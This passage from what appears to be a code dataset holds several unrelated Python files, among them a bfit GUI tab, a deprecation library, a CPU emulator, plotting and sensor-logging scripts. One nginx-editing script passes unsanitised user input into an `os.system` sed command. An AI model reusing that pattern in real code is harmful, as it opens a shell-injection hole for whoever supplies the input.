draw_lines()\n self.bfit.draw_style.set('redraw')\n \n # make new figure, draw single\n elif style == 'new':\n draw_lines()\n else:\n raise ValueError(\"Draw style not recognized\")\n\n # ======================================================================= #\n def export(self):\n \"\"\"Export all data files as csv\"\"\"\n \n # filename\n filename = self.bfit.fileviewer.default_export_filename\n filename = filedialog.askdirectory()+'/'+filename\n \n # get data and write\n for k in self.data.keys():\n d = self.data[k]\n self.bfit.export(d,filename%(d.year,d.run))\n \n # ======================================================================= #\n def get_data(self):\n \"\"\"Split data into parts, and assign to dictionary.\"\"\"\n \n # make list of run numbers, replace possible deliminators\n try:\n run_numbers = self.string2run(self.run.get())\n except ValueError:\n return\n \n # get data\n data = {}\n for r in run_numbers:\n try:\n data[r] = bdata(r,year=int(self.year.get()))\n except RuntimeError:\n print(\"Failed to open run %d (%d)\" % (r,int(self.year.get())))\n \n # check that data is all the same runtype\n run_types = []\n for k in self.data.keys():\n run_types.append(self.data[k].mode)\n for k in data.keys():\n run_types.append(data[k].mode)\n \n # different run types: select all runs of same type\n if not all([r==run_types[0] for r in run_types]):\n \n # unique run modes\n run_type_unique = np.unique(run_types)\n \n # message\n message = \"Multiple run types detected:\\n(\"\n for m in run_type_unique: \n message += m+', '\n message = message[:-2]\n message += ')\\n\\nSelecting ' + run_types[0] + ' runs.'\n messagebox.showinfo(message=message)\n \n # get only run_types[0]\n for k in data.keys():\n if data[k].mode == run_types[0]:\n self.data[k] = data[k]\n self.runmode = run_types[0]\n self.runmode_label['text'] = self.runmode_relabel[run_types[0]]\n \n keys_list = list(self.data.keys())\n keys_list.sort()\n \n # make lines\n n = 1\n for r in keys_list:\n if r in self.data_lines.keys():\n self.data_lines[r].grid(n)\n else:\n self.data_lines[r] = dataline(self.bfit,self.data,\\\n self.data_lines,self.fetch_data_tab,self.data[r],n)\n n+=1\n self.bfit.fit_files.populate()\n \n # ======================================================================= #\n def remove_all(self):\n \"\"\"Remove all data files from self.data_lines\"\"\"\n del_list = []\n for r in self.data_lines.keys():\n if self.data_lines[r].check_state.get():\n del_list.append(self.data_lines[r])\n for d in del_list:\n d.remove()\n \n # ======================================================================= #\n def return_binder(self):\n \"\"\"Switch between various functions of the enter button. \"\"\"\n \n # check where the focus is\n focus_id = str(self.bfit.root.focus_get())\n \n # run or year entry\n if focus_id in [str(self.entry_run), str(self.entry_year)]:\n self.get_data()\n \n # checked rebin or checked run omission\n elif focus_id in [str(self.check_rebin_box),\\\n str(self.check_bin_remove_entry)]:\n self.set_all()\n elif focus_id == str(self.check_all_box):\n self.draw_all()\n else:\n pass\n\n # ======================================================================= #\n def set_all(self):\n \"\"\"Set a particular property for all checked items. \"\"\"\n \n # check all file lines\n for r in self.data_lines.keys():\n \n # if checked\n if self.data_lines[r].check_state.get():\n \n # get values to enter\n self.data_lines[r].rebin.set(self.check_rebin.get())\n new_text = self.check_bin_remove.get()\n \n # check for greyed text\n if new_text != self.bin_remove_starter_line:\n self.data_lines[r].bin_remove.set(new_text)\n else:\n self.data_lines[r].bin_remove.set(\"\")\n \n # generate focus out event: trigger grey text reset\n self.data_lines[r].bin_remove_entry.event_generate('')\n\n # ======================================================================= #\n def string2run(self,string):\n \"\"\"Parse string, return list of run numbers\"\"\"\n \n full_string = string.replace(',',' ').replace(';',' ')\n full_string = full_string.replace(':','-')\n part_string = full_string.split()\n \n run_numbers = []\n for s in part_string:\n if '-' in s:\n try:\n rn_lims = [int(s2) for s2 in s.split('-')]\n except ValueError:\n run_numbers.append(int(s.replace('-','')))\n else:\n rns = np.arange(rn_lims[0],rn_lims[1]+1).tolist()\n run_numbers.extend(rns)\n else:\n run_numbers.append(int(s))\n # sort\n run_numbers.sort()\n \n if len(run_numbers) > 50:\n raise RuntimeWarning(\"Too many files selected (max 50).\")\n return run_numbers\n \n# =========================================================================== #\n# =========================================================================== #\nclass dataline(object):\n \"\"\"\n A line of objects to display run properties and remove bins and whatnot.\n \"\"\"\n \n bin_remove_starter_line = '1 5 100-200 (omit bins)'\n \n # ======================================================================= #\n def __init__(self,bfit,datalist,lines_list,fetch_tab_frame,bd,row):\n \"\"\"\n Inputs:\n fetch_tab_frame: parent in which to place line\n bd: bdata object corresponding to the file which is placed here. \n row: where to grid this object\n \"\"\"\n \n # variables\n self.bin_remove = StringVar()\n self.rebin = IntVar()\n self.check_state = BooleanVar()\n self.mode = bd.mode\n self.run = bd.run\n self.year = bd.year\n self.row = row\n self.bfit = bfit\n self.datalist = datalist # fetch_files.data\n self.lines_list = lines_list\n \n # temperature\n try:\n self.temperature = int(np.round(bd.camp.smpl_read_A.mean))\n except AttributeError:\n self.temperature = -1\n \n # field\n try:\n if bd.area == 'BNMR':\n self.field = np.around(bd.camp.b_field.mean,2)\n field_text = \"%.2f T\"%self.field\n else:\n self.field = np.around(bd.camp.hh_current.mean,2)\n field_text = \"%.2f A\"%self.field\n except AttributeError:\n self.field = -1\n field_text = ' '*6\n try:\n if bd.area == 'BNMR':\n self.bias = np.around(bd.epics.nmr_bias_p.mean,2)\n else:\n self.bias = np.around(bd.epics.nqr_bias.mean,2)/1000.\n \n if self.bias > 0:\n bias_text = \"%.2f kV\"%self.bias\n else:\n bias_text = \"% .2f kV\"%self.bias\n except AttributeError:\n self.bias = -1\n bias_text = ' '*7\n \n # build objects\n line_frame = ttk.Frame(fetch_tab_frame,pad=(5,0))\n year_label = ttk.Label(line_frame,text=\"%d\"%self.year,pad=5)\n run_label = ttk.Label(line_frame,text=\"%d\"%self.run,pad=5)\n temp_label = ttk.Label(line_frame,text=\"%3d K\"%self.temperature,pad=5)\n field_label = ttk.Label(line_frame,text=field_text,pad=5)\n bias_label = ttk.Label(line_frame,text=bias_text,pad=5)\n bin_remove_entry = ttk.Entry(line_frame,textvariable=self.bin_remove,\\\n width=20)\n remove_button = ttk.Button(line_frame,text='Remove',\\\n command=self.remove,pad=5)\n draw_button = ttk.Button(line_frame,text='Draw',command=self.draw,pad=5)\n \n rebin_label = ttk.Label(line_frame,text=\"Rebin:\",pad=5)\n rebin_box = Spinbox(line_frame,from_=1,to=100,width=3,\\\n textvariable=self.rebin)\n \n self.check_state.set(False)\n check = ttk.Checkbutton(line_frame,text='',variable=self.check_state,\\\n onvalue=True,offvalue=False,pad=5)\n \n # add grey text to bin removal\n bin_remove_entry.insert(0,self.bin_remove_starter_line)\n entry_fn = partial(on_entry_click,\\\n text=self.bin_remove_starter_line,entry=bin_remove_entry)\n on_focusout_fn = partial(on_focusout,\\\n text=self.bin_remove_starter_line,entry=bin_remove_entry)\n bin_remove_entry.bind('', entry_fn)\n bin_remove_entry.bind('', on_focusout_fn)\n bin_remove_entry.config(foreground='grey')\n \n # grid\n year_label.grid(column=1,row=0,sticky=E)\n run_label.grid(column=2,row=0,sticky=E)\n temp_label.grid(column=3,row=0,sticky=E)\n field_label.grid(column=4,row=0,sticky=E)\n bias_label.grid(column=5,row=0,sticky=E)\n if self.mode in ['1f','1n']: \n bin_remove_entry.grid(column=6,row=0,sticky=E)\n if self.mode == '20': \n rebin_label.grid(column=6,row=0,sticky=E)\n rebin_box.grid(column=7,row=0,sticky=E)\n check.grid(column=8,row=0,sticky=E)\n draw_button.grid(column=9,row=0,sticky=E)\n remove_button.grid(column=10,row=0,sticky=E)\n \n # passing\n self.line_frame = line_frame\n self.bin_remove_entry = bin_remove_entry\n \n # grid frame\n self.grid(row)\n \n # ======================================================================= #\n def grid(self,row):\n \"\"\"Re-grid a dataline object so that it is in order by run number\"\"\"\n self.row = row\n self.line_frame.grid(column=0,row=row,columnspan=2, sticky=(W,N))\n \n # ======================================================================= #\n def remove(self):\n \"\"\"Remove displayed dataline object from file selection. \"\"\"\n \n # kill buttons and fram\n for child in self.line_frame.winfo_children():\n child.destroy()\n for child in self.line_frame.winfo_children():\n child.destroy()\n self.line_frame.destroy()\n \n # get rid of data\n del self.datalist[self.run]\n del self.lines_list[self.run]\n \n self.bfit.fit_files.populate()\n \n # ======================================================================= #\n def draw(self):\n \"\"\"Draw single data file.\"\"\"\n d = self.bfit.fileviewer.asym_type.get()\n d = self.bfit.fileviewer.asym_dict[d]\n \n if self.bin_remove.get() == self.bin_remove_starter_line:\n self.bfit.draw(self.datalist[self.run],d,self.rebin.get())\n else:\n self.bfit.draw(self.datalist[self.run],d,self.rebin.get(),\\\n option=self.bin_remove.get())\n \n# =========================================================================== #\ndef on_entry_click(event,entry,text):\n \"\"\"Vanish grey text on click\"\"\"\n if entry.get() == text:\n entry.delete(0, \"end\") # delete all the text in the entry\n entry.insert(0, '') #Insert blank for user input\n entry.config(foreground = 'black')\n\n# =========================================================================== #\ndef on_focusout(event,entry,text):\n \"\"\"Set grey text for boxes on exit\"\"\"\n if entry.get() == '':\n entry.insert(0,text)\n entry.config(foreground = 'grey')\n else:\n entry.config(foreground = 'black')\n\n\n\n","sub_path":"bfit/fetch_files_tab.py","file_name":"fetch_files_tab.py","file_ext":"py","file_size_in_byte":20714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"589817555","text":"from functools import wraps\nimport inspect\n\nimport attr\n\nfrom regret import _sphinx, _warnings, emitted\n\n\nclass NoSuchParameter(Exception):\n pass\n\n\n@attr.s(eq=True, frozen=True)\nclass Deprecator:\n \"\"\"\n Deprecators help manifest regret.\n\n Arguments:\n\n emit:\n\n a callable which will be called with one argument, a\n `regret.emitted.Deprecation` instance, whenever a deprecated\n object has been used. If unprovided, by default, a warning\n will be shown using the standard library `warnings` module.\n\n name_of:\n\n a callable which given any Python object should return\n a suitable name for the object. If unprovided, the\n `__qualname__ ` will be used, and\n therefore an object's (non-fully-)qualified name will appear\n in messages.\n\n new_docstring:\n\n a callable which should produce a docstring for newly\n deprecated objects. It will be called with three *keyword*\n arguments:\n\n * ``object``, the object that is being deprecated\n\n * ``name_of``, the callable described above for use in\n calculating object names\n\n * ``version``, the version that deprecates the provided object\n\n and it should return a single string which will become\n the new docstring for a deprecated object. If unprovided,\n deprecation docstrings will be constructed using syntax\n suitable for `Sphinx `, via the `deprecated`\n directive.\n \"\"\"\n\n _emit = attr.ib(default=_warnings.emit)\n _name_of = attr.ib(default=emitted._qualname)\n _new_docstring = attr.ib(default=_sphinx.doc_with_deprecated_directive)\n\n def _emit_deprecation(self, extra_stacklevel=0, **kwargs):\n self._emit(\n deprecation=emitted.Deprecation(name_of=self._name_of, **kwargs),\n extra_stacklevel=extra_stacklevel,\n )\n\n # -- Deprecatable objects --\n\n def callable(\n self,\n version,\n replacement=None,\n removal_date=None,\n addendum=None,\n ):\n \"\"\"\n Deprecate a callable as of the given version.\n\n Arguments:\n\n version:\n\n the first version in which the deprecated object was\n considered deprecated\n\n replacement:\n\n optionally, an object that is the (direct or indirect)\n replacement for the functionality previously performed\n by the deprecated callable\n\n removal_date (datetime.date):\n\n optionally, a date when the object is expected to be\n removed entirely\n\n addendum (str):\n\n an optional additional message to include at the end of\n warnings emitted for this deprecation\n \"\"\"\n\n def deprecate(thing):\n @wraps(thing)\n def call_deprecated(*args, **kwargs):\n self._emit_deprecation(\n kind=emitted.Callable(object=call_deprecated),\n replacement=replacement,\n removal_date=removal_date,\n addendum=addendum,\n )\n return thing(*args, **kwargs)\n\n __doc__ = thing.__doc__\n if __doc__ is not None:\n call_deprecated.__doc__ = self._new_docstring(\n object=thing,\n name_of=self._name_of,\n replacement=replacement,\n removal_date=removal_date,\n version=version,\n )\n\n return call_deprecated\n return deprecate\n\n def parameter(self, version, name):\n def deprecate(thing):\n if hasattr(thing, \"__regret_parameter__\"):\n return thing.__regret_parameter__(name)\n return _PartiallyDeprecated(\n emit=self._emit_deprecation,\n callable=thing,\n ).__regret_parameter__(name)\n return deprecate\n\n def inheritance(self, version):\n \"\"\"\n Deprecate allowing a class to be subclassed.\n\n Arguments:\n\n version:\n\n the first version in which the deprecated object was\n considered deprecated\n \"\"\"\n\n def deprecate(cls):\n @wraps(cls, updated=())\n class DeprecatedForSubclassing(cls):\n def __init_subclass__(Subclass, **kwargs):\n self._emit_deprecation(\n kind=emitted.Inheritance(\n type=DeprecatedForSubclassing,\n ),\n )\n super().__init_subclass__(**kwargs)\n return DeprecatedForSubclassing\n\n return deprecate\n\n\nclass _PartiallyDeprecated:\n \"\"\"\n A partially deprecated callable.\n \"\"\"\n\n def __init__(self, emit, callable, deprecated_parameters=()):\n wraps(callable)(self)\n\n signature = inspect.signature(callable, follow_wrapped=False)\n kwargs_name = next(\n (\n name\n for name, parameter in reversed(signature.parameters.items())\n if parameter.kind == inspect.Parameter.VAR_KEYWORD\n ), None,\n )\n\n def _maybe_emit_deprecation(*args, **kwargs):\n arguments = signature.bind(*args, **kwargs).arguments\n for name in deprecated_parameters:\n if name in arguments:\n parameter = signature.parameters[name]\n elif (\n kwargs_name is not None\n and name in arguments.get(kwargs_name, {})\n ):\n parameter = inspect.Parameter(\n name=name,\n kind=inspect.Parameter.KEYWORD_ONLY,\n )\n else: # our best friend, the peephole optimizer bug.\n continue # pragma: no cover\n\n emit(\n kind=emitted.Parameter(callable=self, parameter=parameter),\n extra_stacklevel=1,\n )\n return callable(*args, **kwargs)\n\n def _regret_additional_parameter(name):\n if name not in signature.parameters and kwargs_name is None:\n raise NoSuchParameter(name)\n\n order = {\n parameter: index\n for index, parameter in enumerate(signature.parameters)\n }\n signature_ordered = sorted(\n list(deprecated_parameters) + [name],\n key=lambda each: (\n order.get(each, order.get(kwargs_name, -1)),\n each,\n ),\n )\n\n return _PartiallyDeprecated(\n emit=emit,\n callable=callable,\n deprecated_parameters=signature_ordered,\n )\n\n self.__regret_maybe_emit_deprecation__ = _maybe_emit_deprecation\n self.__regret_parameter__ = _regret_additional_parameter\n\n def __call__(self, *args, **kwargs):\n return self.__regret_maybe_emit_deprecation__(*args, **kwargs)\n\n\n_DEPRECATOR = Deprecator()\n","sub_path":"regret/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"465105976","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport re\nimport os\n\n\n\na=\":\"\nproxy=raw_input(\"entry ip:port: \")\nfile=raw_input(\"entry nginxfile: \")\nf=open(\"txt\",'r')\nstr=f.read()\n\n\n# 分为开头,中间和结尾三部分,提取可能包含ip地址的字符串\n# 匹配中间部分的ip,返回列表\nresult = re.findall(r'\\D(?:\\d{1,3}\\.){3}(?:25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\D',str)\n\n# 匹配开头可能出现ip\nret_start = re.match(r'(\\d{1,3}\\.){3}(?:25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\D',str)\nif ret_start:\n result.append(ret_start.group())\n\n# 匹配结尾\nret_end = re.search(r'\\D(\\d{1,3}\\.){3}(25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)$',str)\nif ret_end:\n result.append(ret_end.group())\n\n\n# 构造列表保存ip地址\nip_list = []\nfor r in result:\n # 正则提取ip\n ret = re.search(r'((25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)\\.){3}(25[0-5]|2[0-4]\\d|1\\d{2}|[1-9]?\\d)', r)\n if ret:\n # 匹配成功则将ip地址添加到列表中\n ip_list.append(ret.group())\n\nport=re.findall(\"[0-9][0-9][0-9][0-9]\",str)\nfor i in port:\n info=ip_list[0]+a+i\n os.system(\"sed -i 's/%s/%s/g' %s\"%(info,proxy,file))\n\n# 输入结果列表d\n#print ip_list[0]","sub_path":"改nginx反向代理ip端口.py","file_name":"改nginx反向代理ip端口.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"531472607","text":"import matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport pandas as pd\nfrom itertools import product\nimport numpy as np\n\n# plot train and validation loss across multiple runs\nfrom utility.clustering_utils import merge_predictions\nfrom utility.folder_creator import folder_creator\nfrom utility.reader import get_crypto_symbols_from_folder\n\ndef plot_train_and_validation_accuracy(train,test,output_folder,filename=None):\n fig=plt.figure(figsize=(12, 7),dpi=150)\n plt.plot(train, color='blue', label='Train')\n plt.plot(test, color='orange', label='Validation')\n plt.title('model train vs validation accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n legend_elements = [Line2D([0], [0], color='blue', lw=2, label='Train'),\n Line2D([0], [0], color='orange', lw=2, label='Validation'),]\n plt.legend(handles=legend_elements, loc='upper left')\n plt.savefig(output_folder + filename+\".png\", dpi=150)\n plt.cla()\n plt.clf()\n plt.close(fig)\ndef plot_train_and_validation_loss(train,test,output_folder,filename=None):\n fig=plt.figure(figsize=(12, 7),dpi=150)\n plt.plot(train, color='blue', label='Train')\n plt.plot(test, color='orange', label='Validation')\n plt.title('model train vs validation loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n legend_elements = [Line2D([0], [0], color='blue', lw=2, label='Train'),\n Line2D([0], [0], color='orange', lw=2, label='Validation'),]\n plt.legend(handles=legend_elements, loc='upper left')\n plt.savefig(output_folder + filename+\".png\", dpi=150)\n plt.cla()\n plt.clf()\n plt.close(fig)\n\n#plot the actual value and the predicted value\ndef plot_actual_vs_predicted(\n input_data, crypto, list_neurons, list_temporal_sequences, output_path):\n\n #reads the csv (merged_predictions.csv)\n data = pd.read_csv(input_data)\n #for crypto, neurons, days in product(cryptocurrencies, list_neurons, list_temporal_sequences):\n #read a specific line from the file\n data_cut = data[(data[\"symbol\"] == crypto)]\n for neurons, days in product(list_neurons, list_temporal_sequences):\n data_cut_crypto=data_cut[(data_cut[\"neurons\"] == neurons) & (data[\"days\"] == days)]\n\n #create a figure\n fig = plt.figure(figsize=(12, 7),dpi=150)\n\n #create a subplot\n ax=fig.add_subplot(1,1,1)\n plt.title(str(crypto) + \" - #Neurons:\" + str(neurons) + \" - Previous days:\" + str(days))\n plt.ylabel('Value')\n\n labels = []\n #model oriented information\n #data_cut_model_oriented = data_cut[data[\"model\"] == model]\n ax.plot(range(0, len( data_cut_crypto[\"date\"]), 1), data_cut_crypto[\"observed_value\"])\n labels.append(\"REAL\")\n ax.plot(range(0, len( data_cut_crypto[\"date\"]), 1), data_cut_crypto[\"predicted_value\"])\n labels.append(\"PREDICTED\")\n\n plt.xticks(np.arange(12), data_cut_crypto[\"date\"], rotation=65)\n plt.legend(labels, loc=4)\n plt.grid()\n fig.tight_layout()\n name_fig = str(crypto) + \"_\" + str(neurons) + \"_\" + str(days)\n fig.savefig(output_path + name_fig + \".png\")\n return\n\n\ndef generate_line_chart(experiment_folder,list_temporal_sequences,list_neurons):\n cryptocurrencies = get_crypto_symbols_from_folder(experiment_folder + \"result/\")\n\n merge_predictions(experiment_folder, \"result\")\n\n #create the folder which will contain the line chart\n for crypto in cryptocurrencies:\n folder_creator(experiment_folder+\"/report/line_chart_images/\"+crypto,1)\n plot_actual_vs_predicted(experiment_folder+\"/result/merged_predictions.csv\",\n crypto,\n list_neurons,\n list_temporal_sequences,\n experiment_folder+\"/report/line_chart_images/\"+ crypto+\"/\")","sub_path":"visualization/line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"615465773","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nHLT = 0b00000001\nLDI = 0b10000010\nPRN = 0b01000111\nMUL = 0b10100010\nPUSH = 0b01000101\nPOP = 0b01000110\nCALL = 0b01010000\nRET = 0b00010001\nADD = 0b10100000\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n \n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.reg = [0] * 8\n self.ram = [0] * 256\n self.pc = 0\n self.sp = 7 #points to register not ram location\n self.running = False\n self.branchTable = {\n HLT : self.hlt,\n LDI : self.ldi,\n PRN : self.prn,\n MUL : self.mul,\n PUSH : self.push,\n POP : self.pop,\n CALL : self.call,\n RET : self.ret,\n ADD : self.add\n }\n\n def ram_read(self, MAR):\n return self.ram[MAR]\n \n def ram_write(self, MAR, MDR):\n self.ram[MAR] = MDR\n \n def push(self, a, b):\n reg = a\n value = self.reg[reg]\n self.reg[self.sp] -=1\n self.ram_write(self.reg[self.sp], value)\n self.pc += 2\n \n def pop(self, a, b):\n reg = a\n value = self.ram_read(self.reg[self.sp])\n self.reg[reg] = value\n self.reg[self.sp] +=1\n self.pc += 2\n\n def call(self, a, b):\n reg = a\n after = self.pc + 2\n self.pc = self.reg[reg]\n self.reg[self.sp] -= 1\n self.ram_write(self.reg[self.sp], after)\n\n def ret(self, a, b):\n self.pc = self.ram[self.reg[self.sp]]\n self.reg[self.sp] += 1\n\n def hlt(self, a = None , b = None):\n self.running = False\n\n def ldi(self, a, b):\n self.reg[a] = b\n self.pc += 3\n\n def prn(self, a, b = None):\n print(self.reg[a])\n self.pc += 2\n\n def add(self, a , b):\n self.alu('ADD', a, b)\n self.pc+=3\n\n def mul(self, a, b):\n self.reg[a] = self.reg[a] * self.reg[b]\n self.pc += 3\n\n def load(self, program):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n program = program\n with open(program) as f:\n for line in f:\n command = line.split('#')\n command = command[0].strip()\n if command == '':\n continue\n command = int(command, 2)\n self.ram[address] = command\n address += 1\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n #self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n self.running = True\n # breakpoint()\n\n while self.running:\n IR = self.ram_read(self.pc)\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n if IR in self.branchTable:\n self.branchTable[IR](operand_a, operand_b)\n else:\n print(\"Automatically Exited\")\n self.hlt()","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29792933","text":"from abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass, field\nfrom time import time\nfrom functools import partial\nfrom math import floor\nfrom typing import List, Any\nimport gpiozero\nimport influxdb\nimport socket\nfrom time import sleep, time\nimport json\n\n\n@dataclass\nclass MCP():\n select_pin: int\n channels: int\n voltage: float\n\n def __post_init__(self):\n chip_name = f'MCP300{self.channels}'\n self.__chip = getattr(gpiozero, chip_name)\n\n def __getitem__(self, channel):\n mcp = self.__chip(\n channel=channel,\n select_pin=self.select_pin\n )\n value = mcp.value\n mcp.close()\n return round(value, 2)\n\n def __iter__(self):\n return (\n self.__getitem__(channel)\n for channel in range(0, self.channels, 1)\n )\n\n\n@dataclass\nclass Multiplexer():\n channels: int = 8\n devices: int = 2\n voltage: float = 3.3\n\n @property\n def select_pins(self):\n pins = [8, 7]\n total = self.devices - 2\n start_pin = 12\n for pin in range(\n start_pin,\n min((total + start_pin), 25),\n 1\n ):\n pins.append(pin)\n return pins\n\n def __post_init__(self):\n self.__chips = []\n for pin in self.select_pins:\n chip = MCP(\n select_pin=pin,\n channels=self.channels,\n voltage=self.voltage\n )\n self.__chips.append(chip)\n\n def __getitem__(self, channel):\n device = floor(channel / self.channels)\n channel = channel % self.channels\n return self.__chips[device][channel]\n\n def __iter__(self):\n return (\n value \n for chip in self.__chips\n for value in chip\n )\n\n\nwith open('./config.json') as json_file:\n config = json.load(json_file)\n\nclient = influxdb.InfluxDBClient(\n host=config['influx']['host'],\n port=config['influx']['port'],\n ssl=True,\n database=config['influx']['database']\n)\nmultiplexer = Multiplexer(\n channels=config['chips']['channels'],\n devices=config['chips']['devices'],\n voltage=3.3\n)\ndevices = gpiozero.LED(26)\nwhile True:\n devices.on()\n data_wrapper = [{\n 'measurement': 'sensor_boxes',\n 'tags': {\n 'box': config['local']['name']\n },\n 'time': int(time()),\n 'fields': {\n str(index): value\n for index, value in enumerate((multiplexer))\n }\n }]\n devices.off()\n client.write_points(data_wrapper)\n sleep(3600)\n","sub_path":"sensors/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541682503","text":"import requests\nimport time\nimport json\nimport re\n\nFIREBASE_HOST = 'burning-fire-3884.firebaseio.com'\n\nif __name__ == '__main__':\n\n s = requests.Session()\n res = s.get('https://' + FIREBASE_HOST + '/new_game/.json')\n games = json.loads(res.text)\n game_arr = []\n minimal = 3000000\n maximal = -1\n earliest = 1500000000\n latest = 0 \n\n for game in games:\n if re.search(r'(19|20)\\d{2}-(0[1-9]|1[0-2])-(0[1-9]|[12]\\d|3[01])', games[game]['time']):\n t = time.strptime(games[game]['time'], '%Y-%m-%d')\n games[game]['time'] = int(time.mktime(t))\n games[game]['name'] = game\n game_arr.append(games[game])\n if games[game]['view'] > maximal:\n maximal = games[game]['view']\n if games[game]['view'] < minimal:\n minimal = games[game]['view']\n if games[game]['time'] > latest:\n latest = games[game]['time']\n if games[game]['time'] < earliest:\n earliest = games[game]['time']\n print(game)\n\n print('Minimal: ' + str(minimal))\n print('Maximal: ' + str(maximal))\n print('Earliest: ' + str(earliest))\n print('Latest: ' + str(latest))\n\n res = s.put('https://' + FIREBASE_HOST + '/game/.json', data=json.dumps(game_arr))\n print(res)\n","sub_path":"project3/rebuild.py","file_name":"rebuild.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"149128941","text":"'''\nProblem Statement:\n\nGiven a word w, rearrange the letters of w to construct another word s\nin such a way that s is lexicographically greater than w. In case of multiple\npossible answers, find the lexicographically smallest one among them.\n'''\ninputCases = int(input())\ninputCaseList = [input() for x in range(inputCases)]\n\"\"\"\ndef getOrdList(string):\n '''gets the lexicological value of each character in the string'''\n ordList = sorted([x for x in map(ord, string)])\n return ordList\nassert getOrdList('hello') == [101, 104, 108, 108, 111]\n\n# 5, 4, 6, 7, 5, 2, 2, 1, 0\n\"\"\"\n\n\n# NEED TO REDO THIS PROBLEM AND TAKE OUT ORDS, FIND OUT WHY ORDS DIDNT WORK, THEY MAY HAVE BEEN BACKWARDS\ndef getNonIncreasingSuffix(ordList):\n ordList = ordList[::-1]\n nonIncreasingSuffixList = [ordList[0]]\n i = 1\n while ordList[i] >= ordList[i-1]:\n nonIncreasingSuffixList.append(ordList[i])\n i += 1\n return nonIncreasingSuffixList[::-1]\nassert getNonIncreasingSuffix([5, 4, 6, 7, 5, 2, 2, 1, 0]) == [7, 5, 2, 2, 1, 0]\n\ndef getNextOrder(ordList, suffix):\n '''Using ridiculously long variable names, swaps the rightmost index that is\n one greater than the index that is one index before the suffix, with the index\n that is one index before the suffix'''\n firstSuffixIndex = -(len(suffix))\n oneBeforeSuffixIndex = firstSuffixIndex - 1\n ####### largest smallest, not +1\n i = len(ordList) - 1\n while i > 0:\n if ordList[i] > ordList[oneBeforeSuffixIndex]:\n oneGreaterIndex = i\n i = 0\n else:\n i -= 1\n ordList[oneBeforeSuffixIndex], ordList[oneGreaterIndex] = ordList[oneGreaterIndex], ordList[oneBeforeSuffixIndex]\n ordList[firstSuffixIndex:] = ordList[firstSuffixIndex:][::-1]\n return ordList\nassert getNextOrder([5, 4, 6, 7, 5, 2, 2, 1, 0], [7, 5, 2, 2, 1, 0]) == [5, 4, 7, 0, 1, 2, 2, 5, 6]\n\ndef printCases(cases, caseList):\n for i in range(cases):\n ordList = (list(caseList[i]))\n if sorted(ordList, reverse = True) == ordList:\n print('no answer')\n else:\n nonIncreasingSuffixList = getNonIncreasingSuffix(ordList)\n newOrdList = getNextOrder(ordList, nonIncreasingSuffixList)\n print(''.join(newOrdList))\n\nprintCases(inputCases, inputCaseList)\n","sub_path":"Python/Algorithms/Strings/#9 Greater is Better.py","file_name":"#9 Greater is Better.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609477420","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport gc\nimport pprint\n\n\nclass Graph(object):\n\n def __init__(self, name):\n self.name = name\n self.next = None\n\n def set_next(self, next):\n print(\"Linking nodes {}.next = {}\".format(self, next))\n self.next = next\n\n def __repr__(self):\n return \"{}({})\".format(self.__class__.__name__, self.name)\n\n def __del__(self):\n print(\"{}.__del__()\".format(self))\n\n\ndef main():\n one = Graph(\"one\")\n two = Graph(\"two\")\n three = Graph(\"three\")\n one.set_next(two)\n two.set_next(three)\n three.set_next(one)\n\n print(\"\\nCollecting...\")\n n = gc.collect()\n print(\"Unreachable objects:\", n)\n print(\"Remaining Garbage:\", end=' ')\n pprint.pprint(gc.garbage)\n\n references_to_ignore = [locals(), globals(), gc.garbage]\n\n def find_referring_graphs(obj):\n print(\"Looking for references to {!r}\".format(obj))\n referers = (r for r in gc.get_referrers(obj)\n if r not in references_to_ignore)\n for ref in referers:\n if isinstance(ref, Graph):\n yield ref\n elif isinstance(ref, dict):\n for parent in find_referring_graphs(ref):\n yield parent\n\n print(\"\\nClearing referrers:\")\n for obj in [one, two, three]:\n for ref in 